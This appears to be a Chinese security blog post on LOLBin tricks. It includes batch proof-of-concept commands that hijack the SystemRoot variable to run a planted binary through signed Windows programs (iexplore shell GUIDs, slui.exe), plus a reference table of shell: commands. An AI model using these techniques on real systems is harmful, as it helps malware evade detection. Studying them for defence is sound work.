视频讲解
本期视频我们将分享一些神奇的LOLBIN技巧,首先,给大家介绍下LOLBIN(Living off the land Binaries)的概念,它是攻击者隐藏踪迹的一种常见手段,它会利用操作系统本身的文件或者一些系统的自身签名文件从而绕过检测,这里我们将使用Windows系统自带的start iexplore启动IE浏览器的命令,强制用户打开一些恶意软件,我们用计算器作为概念验证,大家一起来看下!
LOLBIN玩法讲解
来自@notwhickeyTwitter分享
![图片[1]-如何通过IE浏览器强制运行恶意软件-铭心博客](https://oss.imxbk.com//blog/WordPress/img/wz/%E5%A6%82%E4%BD%95%E9%80%9A%E8%BF%87IE%E6%B5%8F%E8%A7%88%E5%99%A8%E5%BC%BA%E5%88%B6%E8%BF%90%E8%A1%8C%E6%81%B6%E6%84%8F%E8%BD%AF%E4%BB%B6/1.webp)
你有没有考虑过IE浏览器是一个LOLBIN?
通过导航到URI:shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}你可以催生rstrui.exe(系统还原)。
如果你修改了SystemRoot环境变量并复制了DLLs,你可以运行任何你喜欢的东西。
![图片[2]-如何通过IE浏览器强制运行恶意软件-铭心博客](https://oss.imxbk.com//blog/WordPress/img/wz/%E5%A6%82%E4%BD%95%E9%80%9A%E8%BF%87IE%E6%B5%8F%E8%A7%88%E5%99%A8%E5%BC%BA%E5%88%B6%E8%BF%90%E8%A1%8C%E6%81%B6%E6%84%8F%E8%BD%AF%E4%BB%B6/2.webp)
验证POC
mkdir %temp%\System32
FOR /R C:\Windows\System32\ %F IN (*.dll) DO COPY "%F" %temp%\System32\ /Y >NUL
set a=C:\Windows\System32\calc.exe
copy %a% %temp%\System32\rstrui.exe /Y > NUL
set SystemRoot=%temp%
start iexplore shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}![图片[3]-如何通过IE浏览器强制运行恶意软件-铭心博客](https://oss.imxbk.com//blog/WordPress/img/wz/%E5%A6%82%E4%BD%95%E9%80%9A%E8%BF%87IE%E6%B5%8F%E8%A7%88%E5%99%A8%E5%BC%BA%E5%88%B6%E8%BF%90%E8%A1%8C%E6%81%B6%E6%84%8F%E8%BD%AF%E4%BB%B6/3.webp)
我发现了一个签名的#lolbin用于代理执行。
使用set将SystemRoot环境修改为一个受控目录。
在路径<controlled directory>\System32\ChangePk.exe中植入一个二进制文件。
复制必要的DLLs。
运行slui.exe。
我想知道它在你的cpu上是否有效。
![图片[4]-如何通过IE浏览器强制运行恶意软件-铭心博客](https://oss.imxbk.com//blog/WordPress/img/wz/%E5%A6%82%E4%BD%95%E9%80%9A%E8%BF%87IE%E6%B5%8F%E8%A7%88%E5%99%A8%E5%BC%BA%E5%88%B6%E8%BF%90%E8%A1%8C%E6%81%B6%E6%84%8F%E8%BD%AF%E4%BB%B6/4.webp)
验证POC
set a=C:\Windows\System32\calc.exe
set SystemRoot=%temp%
mkdir %temp%\System32
copy C:\Windows\System32\slui.exe %temp%\System32\ /Y >NUL
copy %a% %temp%\System32\ChangePk.exe /Y > NUL
FOR /R C:\Windows\System32\ %F IN (*.dll) DO COPY "%F" %temp%\System32\ /Y >NUL
slui.exeLOLBIN介绍
以下内容摘自《浅谈Living Off the Land Binaries》
什么是LoLbins
Living off the land Binaries简称LoLbins。Living off the land 是由ChristopherCampbell和MattGraeber提出的。Lolbins为二进制文件。攻击方可以通过该二进制文件执行超出其本身功能的工作。
LoLbin功能
- 执行代码
- 任意代码执行。
- 通过LOLbins执行其他程序(未带微软签名)或者脚本。
- 代码编译
- 文件操作
- 正在下载;
- 上传;
- 复制。
- 持久性权限维持
- 利用现有的LOLBins来做权限维持。
- 持久性(比如通过隐藏数据在AD中,在登录时候启动。)
- UAC Bypass
- 转储进程内存
- 监控(例如键盘记录器,网络跟踪等等)。
- 逃避/修改日志
- 不需要重定位到文件系统其他位置的DLLinjected/side-loading。
LOLBIN是否有黑客组织在应用?
shell命令 – 完整列表
以下是整理了Windows11的常见shell命令以及打开的应用程序
| Shell命令 | 打开应用 |
|---|---|
| shell:3D Objects | 3D Objects |
| shell:AccountPictures | Account Pictures |
| shell:AddNewProgramsFolder | AddNewProgramsFolder |
| shell:Administrative Tools | Windows Tools |
| shell:AppData | AppData |
| shell:AppDataDesktop | AppDataDesktop |
| shell:AppDataDocuments | AppDataDocuments |
| shell:AppDataFavorites | AppDataFavorites |
| shell:AppDataProgramData | AppDataProgramData |
| shell:Application Shortcuts | Application Shortcuts |
| shell:AppMods | Application Mods |
| shell:AppsFolder | AppsFolder |
| shell:AppUpdatesFolder | AppUpdatesFolder |
| shell:Cache | Cache |
| shell:Camera Roll | Camera Roll |
| shell:CameraRollLibrary | Camera Roll |
| shell:Captures | Captures |
| shell:CD Burning | Temporary Burn Folder |
| shell:ChangeRemoveProgramsFolder | ChangeRemoveProgramsFolder |
| shell:Common Administrative Tools | Windows Tools |
| shell:Common AppData | Common AppData |
| shell:Common Desktop | Public Desktop |
| shell:Common Documents | Public Documents |
| shell:Common Programs | Programs |
| shell:Common Start Menu | Start Menu |
| shell:Common Start Menu Places | Start Menu |
| shell:Common Startup | Startup |
| shell:Common Templates | Common Templates |
| shell:CommonDownloads | Public Downloads |
| shell:CommonMusic | Public Music |
| shell:CommonPictures | Public Pictures |
| shell:CommonRingtones | CommonRingtones |
| shell:CommonVideo | Public Videos |
| shell:ConflictFolder | ConflictFolder |
| shell:ConnectionsFolder | ConnectionsFolder |
| shell:Contacts | Contacts |
| shell:ControlPanelFolder | ControlPanelFolder |
| shell:Cookies | Cookies |
| shell:CredentialManager | CredentialManager |
| shell:CryptoKeys | CryptoKeys |
| shell:CSCFolder | CSCFolder |
| shell:Desktop | Desktop |
| shell:Development Files | Development Files |
| shell:Device Metadata Store | Device Metadata Store |
| shell:DocumentsLibrary | Documents |
| shell:Downloads | Downloads |
| shell:DpapiKeys | DpapiKeys |
| shell:Favorites | Favorites |
| shell:Fonts | Fonts |
| shell:GameTasks | GameTasks |
| shell:History | History |
| shell:ImplicitAppShortcuts | ImplicitAppShortcuts |
| shell:InternetFolder | InternetFolder |
| shell:Libraries | Libraries |
| shell:Links | Links |
| shell:Local AppData | Local AppData |
| shell:Local Documents | Documents |
| shell:Local Downloads | Downloads |
| shell:Local Music | Music |
| shell:Local Pictures | Pictures |
| shell:Local Videos | Videos |
| shell:LocalAppDataLow | LocalAppDataLow |
| shell:LocalizedResourcesDir | LocalizedResourcesDir |
| shell:MAPIFolder | MAPIFolder |
| shell:MusicLibrary | Music |
| shell:My Music | Music |
| shell:My Pictures | Pictures |
| shell:My Video | Videos |
| shell:MyComputerFolder | MyComputerFolder |
| shell:NetHood | NetHood |
| shell:NetworkPlacesFolder | NetworkPlacesFolder |
| shell:OEM Links | OEM Links |
| shell:OneDrive | OneDrive |
| shell:OneDriveCameraRoll | OneDriveCameraRoll |
| shell:OneDriveDocuments | OneDriveDocuments |
| shell:OneDriveMusic | OneDriveMusic |
| shell:OneDrivePictures | OneDrivePictures |
| shell:Original Images | Original Images |
| shell:Personal | Documents |
| shell:PhotoAlbums | Slide Shows |
| shell:PicturesLibrary | Pictures |
| shell:Playlists | Playlists |
| shell:PrintersFolder | PrintersFolder |
| shell:PrintHood | PrintHood |
| shell:Profile | Profile |
| shell:ProgramFiles | Program Files |
| shell:ProgramFilesCommon | ProgramFilesCommon |
| shell:ProgramFilesCommonX64 | ProgramFilesCommonX64 |
| shell:ProgramFilesCommonX86 | ProgramFilesCommonX86 |
| shell:ProgramFilesX64 | ProgramFilesX64 |
| shell:ProgramFilesX86 | Program Files (x86) |
| shell:Programs | Programs |
| shell:Public | Public |
| shell:PublicAccountPictures | Public Account Pictures |
| shell:PublicGameTasks | PublicGameTasks |
| shell:PublicLibraries | PublicLibraries |
| shell:Quick Launch | Quick Launch |
| shell:Recent | Recent Items |
| shell:Recorded Calls | Recorded Calls |
| shell:RecordedTVLibrary | Recorded TV |
| shell:RecycleBinFolder | RecycleBinFolder |
| shell:ResourceDir | ResourceDir |
| shell:Retail Demo | Retail Demo |
| shell:Ringtones | Ringtones |
| shell:Roamed Tile Images | Roamed Tile Images |
| shell:Roaming Tiles | Roaming Tiles |
| shell:SavedGames | Saved Games |
| shell:SavedPictures | Saved Pictures |
| shell:SavedPicturesLibrary | Saved Pictures |
| shell:Screenshots | Screenshots |
| shell:Searches | Searches |
| shell:SearchHistoryFolder | SearchHistoryFolder |
| shell:SearchHomeFolder | SearchHomeFolder |
| shell:SearchTemplatesFolder | SearchTemplatesFolder |
| shell:SendTo | SendTo |
| shell:Start Menu | Start Menu |
| shell:Startup | Startup |
| shell:SyncCenterFolder | SyncCenterFolder |
| shell:SyncResultsFolder | SyncResultsFolder |
| shell:SyncSetupFolder | SyncSetupFolder |
| shell:System | System |
| shell:SystemCertificates | SystemCertificates |
| shell:SystemX86 | SystemX86 |
| shell:Templates | Templates |
| shell:ThisDeviceFolder | ThisDeviceFolder |
| shell:ThisPCDesktopFolder | Desktop |
| shell:User Pinned | User Pinned |
| shell:UserProfiles | Users |
| shell:UserProgramFiles | UserProgramFiles |
| shell:UserProgramFilesCommon | UserProgramFilesCommon |
| shell:UsersFilesFolder | UsersFilesFolder |
| shell:UsersLibrariesFolder | UsersLibrariesFolder |
| shell:VideosLibrary | Videos |
| shell:Windows | Windows |
上面的不是重点,重点在这里,还有一些很奇怪的使用GUID打开的方式
| 包含GUID的shell命令 | 打开的应用 |
|---|---|
| shell:::{088e3905-0323-4b02-9826-5d99428e115f} | Downloads |
| shell:::{0DB7E03F-FC29-4DC6-9020-FF41B59E513A} | 3D Objects |
| shell:::{1CF1260C-4DD0-4ebb-811F-33C572699FDE} | Music |
| shell:::{24ad3ad4-a569-4530-98e1-ab02f9417aa8} | Pictures |
| shell:::{2559a1f8-21d7-11d4-bdaf-00c04f60b9f0} | Windows Search |
| shell:::{3134ef9c-6b18-4996-ad04-ed5912e00eb5} | Recent Files |
| shell:::{374DE290-123F-4565-9164-39C4925E467B} | Downloads |
| shell:::{38A98528-6CBF-4CA9-8DC0-B1E1D10F7B1B} | Connect To |
| shell:::{3ADD1653-EB32-4cb0-BBD7-DFA0ABB5ACCA} | Pictures |
| shell:::{3dfdf296-dbec-4fb4-81d1-6a3438bcf4de} | Music |
| shell:::{450D8FBA-AD25-11D0-98A8-0800361B1103} | My Documents |
| shell:::{679f85cb-0220-4080-b29b-5540cc05aab6} | Quick Access |
| shell:::{A0953C92-50DC-43bf-BE83-3742FED03C9C} | Videos |
| shell:::{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0} | Documents |
| shell:::{B4BFCC3A-DB2C-424C-B029-7FE99A87C641} | Desktop |
| shell:::{d3162b92-9365-467a-956b-92703aca08af} | Documents |
| shell:::{f86fa3ab-70d2-4fc7-9c99-fcbf05467f3a} | Videos |
| shell:::{D4480A50-BA28-11d1-8E75-00C04FA31A86} | Add Network Place |
| shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D} | All Control Panel Items |
| shell:::{ED7BA470-8E54-465E-825C-99712043E01C} | All Tasks |
| shell:::{4234d49b-0245-4df3-b780-3893943456e1} | Applications |
| shell:::{c57a6066-66a3-4d91-9eb9-41532179f0a5} | AppSuggestedLocations |
| shell:::{9C60DE1E-E5FC-40f4-A487-460851A8D915} | AutoPlay |
| shell:::{28803F59-3A75-4058-995F-4EE5503B023C} | Bluetooth Devices |
| shell:::{9343812e-1c37-4a49-a12e-4b2d810d956b} | Classic Windows Search |
| shell:::{437ff9c0-a07f-4fa0-af80-84b6c6440a16} | Command Folder |
| shell:::{d34a6ca6-62c2-4c34-8a7c-14709c1ad938} | Common Places FS Folder |
| shell:::{F02C1A0D-BE21-4350-88B0-7367FC96EF3C} | Network Computers and Devices |
| shell:::{26EE0668-A00A-44D7-9371-BEB064C98683} | Control Panel |
| shell:::{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0} | Control Panel command object for Start menu and desktop |
| shell:::{1206F5F1-0569-412C-8FEC-3204630DFB70} | Credential Manager |
| shell:::{b155bdf8-02f0-451e-9a26-ae317cfd7779} | delegate folder that appears in Computer |
| shell:::{A8A91A66-3A7D-4424-8D24-04E180695C7A} | Devices and Printers |
| shell:::{289AF617-1CC3-42A6-926C-E6A863F0E3BA} | Media Servers |
| shell:::{D555645E-D4F8-4c29-A827-D93C859C4F2A} | Ease of Access Center |
| shell:::{ECDB0924-4208-451E-8EE0-373C0956DE16} | Work Folders |
| shell:::{323CA680-C24D-4099-B94D-446DD2D7249E} | Favorites |
| shell:::{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} | File Explorer Options |
| shell:::{93412589-74D4-4E4E-AD0E-E0CB621440FD} | Font settings |
| shell:::{3936E9E4-D92C-4EEE-A85A-BC16D5EA0819} | Frequent folders |
| shell:::{1D2680C9-0E2A-469d-B787-065558BC7D43} | Fusion Cache |
| shell:::{F6B6E965-E9B2-444B-9286-10C9152EDBC5} | File History |
| shell:::{67CA7650-96E6-4FDD-BB43-A8E774F73A57} | HomeGroup |
| shell:::{0907616E-F5E6-48D8-9D61-A91C3D28106D} | Remote File Browser |
| shell:::{15eae92e-f17a-4431-9f28-805e482dafd4} | Get Programs |
| shell:::{d450a8a1-9568-45c7-9c0e-b4f9fb4537bd} | Installed Updates |
| shell:::{B2B4A4D1-2754-4140-A2EB-9A76D9D7CDC6} | Linux |
| shell:::{1FA9085F-25A2-489B-85D4-86326EEDCD87} | Manage Wireless Networks |
| shell:::{63da6ec0-2e98-11cf-8d82-444553540000} | Microsoft FTP Folder |
| shell:::{89D83576-6BD1-4c86-9454-BEB04E94C819} | Microsoft Office Outlook |
| shell:::{5ea4f148-308c-46d7-98a9-49041b1dd468} | Windows Mobility Center |
| shell:::{208D2C60-3AEA-1069-A2D7-08002B30309D} | Network |
| shell:::{8E908FC9-BECC-40f6-915B-F4CA0E70D03D} | Network and Sharing Center |
| shell:::{7007ACC7-3202-11D1-AAD2-00805FC1270E} | Network Connections |
| shell:::{992CFFA0-F557-101A-88EC-00DD010CCC48} | Network Connections |
| shell:::{BD7A2E7B-21CB-41b2-A086-B309680C6B7E} | Offline Files |
| shell:::{AFDB1F70-2A4C-11d2-9039-00C04F8EEB3E} | Offline Files Folder |
| shell:::{018D5C66-4533-4307-9B53-224DE2ED1FE6} | OneDrive |
| shell:::{6785BFAC-9D2D-4be5-B7E2-59937E8FB80A} | Homegroup |
| shell:::{ED834ED6-4B5A-4bfe-8F11-A626DCB6A921} | Personalization |
| shell:::{35786D3C-B075-49b9-88DD-029876E11C01} | Portable Devices |
| shell:::{025A5937-A6BE-4686-A844-36FE4BEC8B6D} | Power Options |
| shell:::{9DB7A13C-F208-4981-8353-73CC61AE2783} | Previous Versions |
| shell:::{a3c3d402-e56c-4033-95f7-4885e80b0111} | Previous Versions Results Delegate Folder |
| shell:::{f8c2ab3b-17bc-41da-9758-339d7dbf2d88} | Previous Versions Results Folder |
| shell:::{2227A280-3AEA-1069-A2DE-08002B30309D} | Printers |
| shell:::{ed50fc29-b964-48a9-afb3-15ebb9b97f36} | printhood delegate folder |
| shell:::{7b81be6a-ce2b-4676-a29e-eb907a5126c5} | Programs and Features |
| shell:::{4336a54d-038b-4685-ab02-99bb52d3fb8b} | Public Folder |
| shell:::{4564b25e-30cd-4787-82ba-39e73a750b14} | Recent Items Instance Folder |
| shell:::{22877a6d-37a1-461a-91b0-dbda5aaebc99} | Recent Places Folder |
| shell:::{645FF040-5081-101B-9F08-00AA002F954E} | Recycle Bin |
| shell:::{863aa9fd-42df-457b-8e4d-0de1b8015c60} | Remote Printers |
| shell:::{F5FB2C77-0E2F-4A16-A381-3E560C68BC83} | Removable Drives |
| shell:::{a6482830-08eb-41e2-84c1-73920c2badb9} | Removable Storage Devices |
| shell:::{2965e715-eb66-4719-b53f-1672673bbefa} | Results Folder |
| shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0} | Run… |
| shell:::{D9EF8727-CAC2-4e60-809E-86F80A666C91} | BitLocker Drive Encryption |
| shell:::{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6} | Security and Maintenance |
| shell:::{2559a1f7-21d7-11d4-bdaf-00c04f60b9f0} | Set Program Access and Computer Defaults |
| shell:::{17cd9488-1228-4b2f-88ce-4298e93e0966} | Default Programs |
| shell:::{3080F90D-D7AD-11D9-BD98-0000947B0257} | Show desktop |
| shell:::{58E3C745-D971-4081-9034-86E34B30836A} | Speech Recognition |
| shell:::{48e7caab-b918-4e58-a94d-505519c795dc} | Start Menu |
| shell:::{F942C606-0914-47AB-BE56-1321B8035096} | Storage Spaces |
| shell:::{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF} | Sync Center |
| shell:::{2E9E59C0-B437-4981-A647-9C34B9B90891} | Sync Setup Folder |
| shell:::{BB06C0E4-D293-4f75-8A90-CB05B6477EEE} | About System |
| shell:::{9FE63AFD-59CF-4419-9775-ABCC3849F861} | System Recovery |
| shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107} | System Restore |
| shell:::{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9} | Taskbar |
| shell:::{0DF44EAA-FF21-4412-828E-260A8728E7F1} | Taskbar |
| shell:::{5b934b42-522b-4c34-bbfe-37a3ef7b9c90} | This Device |
| shell:::{f8278c54-a712-415b-b593-b77a2be0dda9} | This Device |
| shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D} | This PC |
| shell:::{C58C4893-3BE0-4B45-ABB5-A63E4B8C8651} | Troubleshooting |
| shell:::{60632754-c523-4b62-b45c-4172da012619} | User Accounts |
| shell:::{7A9D77BD-5403-11d2-8785-2E0420524153} | User Accounts |
| shell:::{1f3427c8-5c10-4210-aa03-2ee45287d668} | User Pinned |
| shell:::{59031a47-3f72-44a7-89c5-5595fe6b30ee} | UsersFiles |
| shell:::{031E4825-7B94-4dc3-B131-E946B44C8DD5} | Libraries |
| shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257} | Switch between windows |
| shell:::{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD} | Backup and Restore (Windows 7) |
| shell:::{4026492F-2F69-46B8-B9BF-5654FC07E423} | Windows Defender Firewall |
| shell:::{67718415-c450-4f3c-bf8a-b487642dc39b} | Windows Features |
| shell:::{2559a1f2-21d7-11d4-bdaf-00c04f60b9f0} | Windows Security |
| shell:::{D20EA4E1-3957-11d2-A40B-0C5020524153} | Windows Tools |
| shell:::{241D7C96-F8BF-4F85-B01F-E2B043341A4B} | RemoteApp and Desktop Connections |
| shell:::{F874310E-B6B7-47DC-BC84-B9E6B38F5903} | The Home folder in File Explorer |
其他资料
© 版权声明
THE END
![表情[keai]-铭心博客](https://www.imxbk.com/wp-content/themes/zibll/img/smilies/keai.gif)
暂无评论内容